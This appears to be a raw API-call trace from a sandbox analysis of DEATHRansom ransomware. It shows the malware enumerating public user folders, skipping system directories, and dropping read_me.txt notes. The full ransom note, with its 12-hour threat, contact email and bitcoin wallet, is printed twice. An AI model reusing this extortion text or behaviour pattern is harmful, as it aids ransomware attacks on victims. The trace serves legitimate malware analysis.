lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 1 [0076.887] wnsprintfW (in: pszDest=0x8d800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0076.887] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2837806f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x289b7a3b, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x36c, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0076.887] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.887] wnsprintfW (in: pszDest=0x8d800c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\read_me.txt") returned 41 [0076.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\read_me.txt" (normalized: "c:\\users\\public\\libraries\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x774 [0076.932] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.932] WriteFile (in: hFile=0x774, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.933] CloseHandle (hObject=0x774) returned 1 [0076.933] GetProcessHeap () returned 0x4f10000 [0076.933] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d800c8 | out: hHeap=0x4f10000) returned 1 [0076.933] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Music", cAlternateFileName="")) returned 1 [0076.933] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music") returned 25 [0076.933] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0076.933] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0076.933] StrStrW (lpFirst="music", lpSrch="programdata") returned 0x0 [0076.933] StrStrW (lpFirst="music", lpSrch="$recycle.bin") returned 0x0 [0076.933] StrStrW (lpFirst="music", lpSrch="program files") returned 0x0 [0076.933] StrStrW (lpFirst="music", lpSrch="windows") returned 0x0 [0076.933] StrStrW (lpFirst="music", lpSrch="all users") returned 0x0 [0076.933] StrStrW (lpFirst="music", lpSrch="appdata") returned 0x0 [0076.933] GetProcessHeap () returned 0x4f10000 [0076.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d800c8 [0076.933] lstrcpyW (in: lpString1=0x8d800c8, lpString2="\\\\?\\C:\\Users\\Public\\Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music") returned="\\\\?\\C:\\Users\\Public\\Music" [0076.933] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 132 [0076.933] QueueUserWorkItem (Function=0x40a710, Context=0x8d800c8, Flags=0x0) returned 1 [0076.933] GetProcessHeap () returned 0x4f10000 [0076.933] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d900d0 [0076.934] wnsprintfW (in: pszDest=0x8d900d0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\*") returned 27 [0076.935] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x254551e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x254551e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.935] wnsprintfW (in: pszDest=0x8d900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\.") returned 27 [0076.935] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.935] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.935] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x254551e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x254551e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.935] wnsprintfW (in: pszDest=0x8d900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\..") returned 28 [0076.935] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.935] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.935] wnsprintfW (in: pszDest=0x8d900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0076.935] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x254551e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x254551e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x254551e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.935] wnsprintfW (in: pszDest=0x8d900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\read_me.txt") returned 37 [0076.935] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0076.935] wnsprintfW (in: pszDest=0x8d900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned 38 [0076.935] lstrcmpW (lpString1="Sample Music", lpString2="..") returned 1 [0076.935] lstrcmpW (lpString1="Sample Music", lpString2=".") returned 1 [0076.935] StrStrW (lpFirst="sample music", lpSrch="programdata") returned 0x0 [0076.935] StrStrW (lpFirst="sample music", lpSrch="$recycle.bin") returned 0x0 [0076.935] StrStrW (lpFirst="sample music", lpSrch="program files") returned 0x0 [0076.935] StrStrW (lpFirst="sample music", lpSrch="windows") returned 0x0 [0076.935] StrStrW (lpFirst="sample music", lpSrch="all users") returned 0x0 [0076.935] StrStrW (lpFirst="sample music", lpSrch="appdata") returned 0x0 [0076.935] GetProcessHeap () returned 0x4f10000 [0076.935] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8da00d8 [0076.936] lstrcpyW (in: lpString1=0x8da00d8, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" [0076.936] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 133 [0076.936] QueueUserWorkItem (Function=0x40a710, Context=0x8da00d8, Flags=0x0) returned 1 [0076.936] GetProcessHeap () returned 0x4f10000 [0076.936] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8db00e0 [0076.937] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*") returned 40 [0076.937] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.997] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\.") returned 40 [0076.997] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.997] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.997] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.997] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\..") returned 41 [0076.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.997] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.997] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0076.997] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Kalimba.mp3", cAlternateFileName="")) returned 1 [0076.997] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0076.997] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Maid with the Flaxen Hair.mp3", cAlternateFileName="MAIDWI~1.MP3")) returned 1 [0076.997] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0076.997] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 1 [0076.997] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0076.997] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 0 [0076.997] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.998] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\read_me.txt") returned 50 [0076.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\read_me.txt" (normalized: "c:\\users\\public\\music\\sample music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0076.999] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.999] WriteFile (in: hFile=0x780, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0077.000] CloseHandle (hObject=0x780) returned 1 [0077.000] GetProcessHeap () returned 0x4f10000 [0077.000] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8db00e0 | out: hHeap=0x4f10000) returned 1 [0077.000] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="sample music", cAlternateFileName="SAMPLE~1")) returned 0 [0077.000] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0077.000] wnsprintfW (in: pszDest=0x8d900d0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\read_me.txt") returned 37 [0077.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\read_me.txt" (normalized: "c:\\users\\public\\music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.000] GetProcessHeap () returned 0x4f10000 [0077.000] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d900d0 | out: hHeap=0x4f10000) returned 1 [0077.000] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Pictures", cAlternateFileName="")) returned 1 [0077.000] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures") returned 28 [0077.001] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0077.001] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0077.001] StrStrW (lpFirst="pictures", lpSrch="programdata") returned 0x0 [0077.001] StrStrW (lpFirst="pictures", lpSrch="$recycle.bin") returned 0x0 [0077.001] StrStrW (lpFirst="pictures", lpSrch="program files") returned 0x0 [0077.001] StrStrW (lpFirst="pictures", lpSrch="windows") returned 0x0 [0077.001] StrStrW (lpFirst="pictures", lpSrch="all users") returned 0x0 [0077.001] StrStrW (lpFirst="pictures", lpSrch="appdata") returned 0x0 [0077.001] GetProcessHeap () returned 0x4f10000 [0077.001] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d900d0 [0077.001] lstrcpyW (in: lpString1=0x8d900d0, lpString2="\\\\?\\C:\\Users\\Public\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures" [0077.001] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 134 [0077.001] QueueUserWorkItem (Function=0x40a710, Context=0x8d900d0, Flags=0x0) returned 1 [0077.001] GetProcessHeap () returned 0x4f10000 [0077.001] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8db00e0 [0077.001] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\*") returned 30 [0077.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x254551e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x254551e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0077.001] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\.") returned 30 [0077.001] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0077.001] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.001] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x254551e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x254551e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0077.001] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\..") returned 31 [0077.001] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.001] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.001] wnsprintfW (in: pszDest=0x8db00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0077.001] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x254551e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x254551e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x254551e0, 